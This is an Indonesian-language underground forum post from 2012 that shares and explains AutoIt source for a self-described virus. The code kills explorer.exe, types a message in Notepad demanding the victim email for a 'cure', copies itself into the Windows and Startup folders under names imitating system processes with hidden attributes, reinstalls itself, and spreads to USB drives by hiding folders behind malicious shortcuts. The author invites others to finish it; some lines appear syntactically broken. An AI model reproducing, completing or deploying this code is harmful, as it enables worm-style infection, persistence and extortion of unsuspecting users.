Underground Cyber Community


 
IndeksPortalCalendarGalleryFAQPencarianAnggotaPendaftaranLogin
Pencarian
 
 

Display results as :
 
Rechercher Advanced Search
Latest topics
Top posters
PrOReBeLL (140)
 
Pahlawan Bertopeng (120)
 
hacker.software (91)
 
jundue (48)
 
q3qyuu (47)
 
hackerccfresh (40)
 
Arwen Lover's (38)
 
tracksmarket (38)
 
Admin (35)
 
alex11 (33)
 
Map Counter

Share | 
 

 Virus Semut Menangis + Explaination

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
Qrembiezs
Neo Member
Neo Member
avatar

Jumlah posting : 3
Join date : 01.05.12

PostSubyek: Virus Semut Menangis + Explaination   Mon Nov 12, 2012 7:29 pm

Ni vir msh blm teruji keamanannya :hore n blm teruji keberadaannya sbner e dah lama si aq bikin cmn males nerusin .. barang kali virmak lain nya mau nerusin & menyempurnakan .. silahkan ..

kata lain ini hanya utk pembelajaran

Code:

Dim $TaskProcessStr[4] = ["firefox.exe, services.exe, Isass.exe, taskmgr.exe"]
Dim $TaskProcessInt[4] = [101, 101, 101, 101]

call ("_pesan")
Call ("_Install")
call ("_Cloning")


Func _Pesan()
  if ProcessExists ("explorer.exe") = True then
     ProcessClose ("explorer.exe")
     Run ("notepad.exe")
       WinWaitActive("[CLASS:Notepad]")
       Send("This System Has infected virus CryAnt.{ENTER 2}")
       Send("Qrembiezs Was Here")
       Send("{ENTER}")
       send("If u want some cure then i've a cure.{ENTER}just email me at [You must be registered and logged in to see this link.].{ENTER}{ENTER}I'm sorry for this{ENTER}{ENTER}")
       Sleep(5000)
       Send("+{UP 2}")
       Sleep(500)
       Send("!f")
       Send("x")
       WinWaitActive("Notepad")
       Send("n")
       WinWaitClose("[CLASS:Notepad]")
  EndIf
EndFunc

Func _Install()
  If Not FileExists(@WindowsDir & '\' & $TaskProcessStr[0]) Then
     FileCopy(@ScriptFullPath, @WindowsDir & '\' & $TaskProcessStr[0])
     FileSetAttrib(@WindowsDir & '\' & $TaskProcessStr[0], '+HRS')
  EndIf
 
 $Proses0 = ProcessList($TaskProcessStr[0])
  If $Proses0[0][0] < 2 Then
     $TaskProcessInt[0] = Run(@WindowsDir & '\' & $TaskProcessStr[0])
  ElseIf Not FileExists(@WindowsDir & '\' & $TaskProcessStr[1]) Then
     FileCopy(@ScriptFullPath, @WindowsDir & '\' & $TaskProcessStr[1])
     FileSetAttrib(@WindowsDir & '\' & $TaskProcessStr[1], '+HRS')
  EndIf
 
 $Proses1 = ProcessList($TaskProcessStr[1])
  If $Proses1[0][0] < 2 Then
     $TaskProcessInt[1] = Run(@WindowsDir & '\' & $TaskProcessStr[1])
  ElseIf Not FileExists(@WindowsDir & '\' & $TaskProcessStr[2]) Then
     FileCopy(@ScriptFullPath, @WindowsDir & '\' & $TaskProcessStr[2])
     FileSetAttrib(@WindowsDir & '\' & $TaskProcessStr[2], '+HRS')
  EndIf
 
 $Proses2 = ProcessList($TaskProcessStr[2])
  If $Proses2[0][0] < 2 Then
     $TaskProcessInt[2] = Run(@WindowsDir & '\' & $TaskProcessStr[2])
  ElseIf Not FileExists(@StartupDir & '\' & $TaskProcessStr[3]) Then
     FileCopy(@ScriptFullPath, @StartupDir & '\' & $TaskProcessStr[3])
     FileSetAttrib(@StartupDir & '\' & $TaskProcessStr[3], '+HRS')
  EndIf
 
 $Proses3 = ProcessList($TaskProcessStr[3])
  If $Proses3[0][0] < 2 Then
     $TaskProcessInt[3] = Run(@StartupDir & '\' & $TaskProcessStr[3])
  EndIf
EndFunc 

Func _FileListToArray($sPath, $sFilter = "*", $iFlag = 0)
  Local $hSearch, $sFile, $sFileList, $sDelim = "|"
  $sPath = StringRegExpReplace($sPath, "[\\/]+\z", "") & "\"
 
  If Not FileExists($sPath) Then
     Return SetError(1, 1, "")
  ElseIf StringRegExp($sFilter, "[\\/:><\|]|(?s)\A\s*\z") Then
     Return SetError(2, 2, "")
  EndIf
 
  If Not ($iFlag = 0 Or $iFlag = 1 Or $iFlag = 2) Then
     Return SetError(3, 3, "")
  EndIf
 
  $hSearch = FileFindFirstFile($sPath & $sFilter)
  If @error Then
     Return SetError(4, 4, "")
  EndIf
 
 While 1
  $sFile = FileFindNextFile($hSearch)
 
  If @error Then
     ExitLoop
  ElseIf ($iFlag + @extended = 2) Then
     ContinueLoop
  EndIf
 
  $sFileList &= $sDelim & $sFile
WEnd

  FileClose($hSearch)
  If Not $sFileList Then
     Return SetError(4, 4, "")
     Return StringSplit(StringTrimLeft($sFileList, 1), "|")
  EndIf
EndFunc 

Func _Cloning()
  $clone = DriveGetDrive ('Removable')
  if Not @error Then
     for $i = 1 To $clone[0]
       If $clone[$i] <> 'a:'
         $ftemp = $clone[$i] & '\autorun.inf\pkl.exe'
         FileCopy(@WindowsDir & '\' & $TaskProcessStr[0], $ftemp, 9)
         FileSetAttrib($ftemp, '+HRS')
         $temp = _FileListToArray($clone[$i], '*', 2)
         For $j = 1 To $temp[0]
           If Not FileExists($clone[$i] & '\' & $temp[$j] & '.lnk') Then
              FileCreateShortcut($ftemp $clone[$i] & '\' & $temp[$j], $clone[$i] & '\' & $temp[$j] & '.lnk', '', '', 'File Folder', 'C:\WINDOWS\system32\shell32.dll', '', 4)
              FileSetAttrib($clone[$i] & '\' & $temp[$j], '+HS')
           EndIf
         Next
       EndIf
     Next
  EndIf
EndFunc

Penjelasan

Code:
Func _Pesan()
  if ProcessExists ("explorer.exe") = True then
     ProcessClose ("explorer.exe")
     Run ("notepad.exe")
       WinWaitActive("[CLASS:Notepad]")
       Send("This System Has infected virus CryAnt.{ENTER 2}")
       Send("Qrembiezs Was Here")
       Send("{ENTER}")
       send("If u want some cure then i've a cure.{ENTER}just email me at [You must be registered and logged in to see this link.].{ENTER}{ENTER}I'm sorry for this{ENTER}{ENTER}")
       Sleep(5000)
       Send("+{UP 2}")
       Sleep(500)
       Send("!f")
       Send("x")
       WinWaitActive("Notepad")
       Send("n")
       WinWaitClose("[CLASS:Notepad]")
  EndIf
EndFunc

Script ini utk menyampaikan pesan bahwa pc ini terinfeksi virus kwokwow bisa narsis wkowkw .. selain menyampaikan pesan script ini akan membunuh explorer.exe utk diarahkan ke notepad.exe dan menampilkan pesan di dlm notepad .. notepad akan mengetik sendiri keyboard dan ditampilkan ke notepad ... text berjalan

sempat aq berfikir utk script yg ini

Code:
 if ProcessExists ("explorer.exe") = True then
     ProcessClose ("explorer.exe")

aq rubah menjadi kek gini

Code:
 if ProcessExists ("explorer.exe") = True then
     shutdown

klo kek gini :ngakak keren .. tp ga narsis dong :wawa masa script baru di eksekusi langsung shutdown :stress

Code:
Func _Install()
  If Not FileExists(@WindowsDir & '\' & $TaskProcessStr[0]) Then
     FileCopy(@ScriptFullPath, @WindowsDir & '\' & $TaskProcessStr[0])
     FileSetAttrib(@WindowsDir & '\' & $TaskProcessStr[0], '+HRS')
  EndIf
 
 $Proses0 = ProcessList($TaskProcessStr[0])
  If $Proses0[0][0] < 2 Then
     $TaskProcessInt[0] = Run(@WindowsDir & '\' & $TaskProcessStr[0])
  ElseIf Not FileExists(@WindowsDir & '\' & $TaskProcessStr[1]) Then
     FileCopy(@ScriptFullPath, @WindowsDir & '\' & $TaskProcessStr[1])
     FileSetAttrib(@WindowsDir & '\' & $TaskProcessStr[1], '+HRS')
  EndIf
 
 $Proses1 = ProcessList($TaskProcessStr[1])
  If $Proses1[0][0] < 2 Then
     $TaskProcessInt[1] = Run(@WindowsDir & '\' & $TaskProcessStr[1])
  ElseIf Not FileExists(@WindowsDir & '\' & $TaskProcessStr[2]) Then
     FileCopy(@ScriptFullPath, @WindowsDir & '\' & $TaskProcessStr[2])
     FileSetAttrib(@WindowsDir & '\' & $TaskProcessStr[2], '+HRS')
  EndIf
 
 $Proses2 = ProcessList($TaskProcessStr[2])
  If $Proses2[0][0] < 2 Then
     $TaskProcessInt[2] = Run(@WindowsDir & '\' & $TaskProcessStr[2])
  ElseIf Not FileExists(@StartupDir & '\' & $TaskProcessStr[3]) Then
     FileCopy(@ScriptFullPath, @StartupDir & '\' & $TaskProcessStr[3])
     FileSetAttrib(@StartupDir & '\' & $TaskProcessStr[3], '+HRS')
  EndIf
 
 $Proses3 = ProcessList($TaskProcessStr[3])
  If $Proses3[0][0] < 2 Then
     $TaskProcessInt[3] = Run(@StartupDir & '\' & $TaskProcessStr[3])
  EndIf
EndFunc 

script ini akan menginstall vir ke dalam dir windows tdk hanya itu .. dia akan menginstal dirinya kembali setelah di dell/di clean selama induk vir msh ada

Code:
Func _Cloning()
  $clone = DriveGetDrive ('Removable')
  if Not @error Then
     for $i = 1 To $clone[0]
       If $clone[$i] <> 'a:'
         $ftemp = $clone[$i] & '\autorun.inf\pkl.exe'
         FileCopy(@WindowsDir & '\' & $TaskProcessStr[0], $ftemp, 9)
         FileSetAttrib($ftemp, '+HRS')
         $temp = _FileListToArray($clone[$i], '*', 2)
         For $j = 1 To $temp[0]
           If Not FileExists($clone[$i] & '\' & $temp[$j] & '.lnk') Then
              FileCreateShortcut($ftemp $clone[$i] & '\' & $temp[$j], $clone[$i] & '\' & $temp[$j] & '.lnk', '', '', 'File Folder', 'C:\WINDOWS\system32\shell32.dll', '', 4)
              FileSetAttrib($clone[$i] & '\' & $temp[$j], '+HS')
           EndIf
         Next
       EndIf
     Next
  EndIf
EndFunc

biasa ... yg namanya vir harus punya penggandaan dir .. nah ni scrit utk menggandakan diri nya ...

msh blm sempurna ... msh males nerusin nya :pasrah
Kembali Ke Atas Go down
 
Virus Semut Menangis + Explaination
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1

Permissions in this forum:Anda tidak dapat menjawab topik
Underground Cyber Community :: Security :: Virus-
Navigasi: